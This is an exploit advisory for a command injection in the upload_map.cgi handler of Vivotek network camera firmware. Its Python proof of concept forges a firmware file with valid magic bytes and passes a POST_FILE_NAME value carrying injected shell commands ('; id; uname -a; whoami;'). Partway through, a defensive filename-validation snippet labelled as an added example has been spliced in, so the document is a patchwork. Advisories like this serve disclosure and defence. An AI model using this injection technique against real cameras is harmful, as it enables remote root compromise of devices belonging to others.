=============================================================================================================================================
| # Title : Vivotek Camera Firmware OS 0100a through 0125c Command Injection in upload_map.cgi via Unsanitized POST_FILE_NAME Parameter |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits) |
| # Vendor : https://www.vivotek.com/ |
=============================================================================================================================================

[+] Summary :

A vulnerability classified as Improper Neutralization of Special Elements used in a Command (Command Injection) has been identified in firmware modules used by multiple network camera models from Vivotek. The issue resides in the CGI binary upload_map.cgi, which operates under the Boa Webserver environment.

The vulnerability occurs because the application improperly processes the POST_FILE_NAME parameter. This user-controlled value is passed directly to a system command without proper sanitization or validation. As a result, attackers can inject shell metacharacters (such as ;) within the filename to execute arbitrary operating system commands.

A proof-of-concept (PoC) demonstrates that an attacker can first create a minimally valid firmware file containing expected magic bytes to bypass basic firmware validation checks. By manipulating the POST_FILE_NAME parameter and injecting additional shell commands, the vulnerable CGI binary executes the injected commands when processing the upload request.

Successful exploitation may allow attackers to achieve remote command execution (RCE) on affected devices, potentially with root privileges, leading to full compromise of the camera system.

The vulnerability affects numerous camera models and firmware versions, including devices in the FD, FE, IB, IP, IT, MA, MS, and TB product series running firmware versions such as 0100a through 0125c.
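The input check the summary describes as missing, written here as an added defensive example (not Vivotek's code and not the author's PoC): it classifies a POST_FILE_NAME value before anything is executed, flags values carrying shell metacharacters so a log review can surface them, and builds a storage path only for allowlisted names. The allowlist pattern, the upload directory and the sample values are constructed assumptions.

```python
import os
import re

# Constructed allowlist, not Vivotek's code: a plain firmware file name such as
# "test_firmware.bin". No path separators, no shell metacharacters.
SAFE_FILENAME = re.compile(r"^[A-Za-z0-9][A-Za-z0-9._-]{0,63}$")

# Characters a shell would interpret if the value reached a system() call.
SHELL_META = set(";|&$`<>(){}'\"\\ \t\n\r")

# Constructed sample of POST_FILE_NAME values as a request log might show them.
SAMPLE_VALUES = [
    "test_firmware.bin",
    "test_firmware.bin; id; uname -a; whoami;",
    "../etc/passwd",
    "fw$(date).bin",
    "",
]


def classify_post_file_name(value: str) -> str:
    """'ok' for an allowlisted name, 'suspicious' if shell metacharacters are
    present (worth an alert), otherwise 'reject'."""
    if SAFE_FILENAME.fullmatch(value) and ".." not in value:
        return "ok"
    if any(ch in SHELL_META for ch in value):
        return "suspicious"
    return "reject"


def staged_path(value: str, upload_dir: str = "/tmp/upload") -> str:
    """Where a validated upload would be written (upload_dir is hypothetical).
    Raising here is what the handler must do before the name reaches any
    command; a rejected name never becomes part of a command line."""
    if classify_post_file_name(value) != "ok":
        raise ValueError(f"rejected POST_FILE_NAME: {value!r}")
    return os.path.join(upload_dir, value)


def scan_values(values):
    """Return the values an analyst should review: those with shell metacharacters."""
    return [v for v in values if classify_post_file_name(v) == "suspicious"]


if __name__ == "__main__":
    for v in SAMPLE_VALUES:
        print(f"{classify_post_file_name(v):10s} {v!r}")
    print("flagged:", scan_values(SAMPLE_VALUES))
```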
[+] CVE Identifier: CVE-2026-22755
[+] Vulnerability Type: Command Injection
[+] Impact: Remote Command Execution (Potential Root Access)

[+] POC :

import os
import subprocess


def create_valid_firmware(filename):
    """
    Creates a dummy firmware file containing the required magic bytes
    to bypass the device's validation check.
    """
    header = b'\xff\x56\xff\xff'
    padding = b'\x00' * 1000
    footer = b'\xff\x4b\xff\xff'
    with open(filename, 'wb') as f:
        f.write(header + padding + footer)
    print(f"[+] Firmware created: {filename} ({os.path.getsize(filename)} bytes)")


def run_exploit():
    firmware_name = "test_firmware.bin"
    cgi_path = "/usr/share/www/cgi-bin/upload_map.cgi"
    create_valid_firmware(firmware_name)
    # The filename with shell metacharacters appended, as described in the summary.
    payload = f"{firmware_name}; id; uname -a; whoami;"
    # CGI environment as the Boa webserver would hand it to upload_map.cgi.
    env_vars = os.environ.copy()
    env_vars.update({
        "REQUEST_METHOD": "POST",
        "CONTENT_LENGTH": str(os.path.getsize(firmware_name)),
        "QUERY_STRING": "camid=1",
        "SCRIPT_NAME": "upload_map.cgi",
        "POST_FILE_NAME": payload
    })
    print(f"[*] Executing exploit via {cgi_path}...")
    print("-" * 40)
    try:
        result = subprocess.run(
            [cgi_path],
            env=env_vars,
            capture_output=True,
            text=True
        )
        print("[!] Command Execution Output:")
        print(result.stdout)
        if result.stderr:
            print("[!] System Errors/Logs:")
            print(result.stderr)
    except FileNotFoundError:
        print(f"[-] Error: {cgi_path} not found. Ensure the path is correct within the emulated environment.")
    except Exception as e:
        print(f"[-] An unexpected error occurred: {e}")


if __name__ == "__main__":
    run_exploit()

Greetings to :==============================================================================

jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
============================================================================================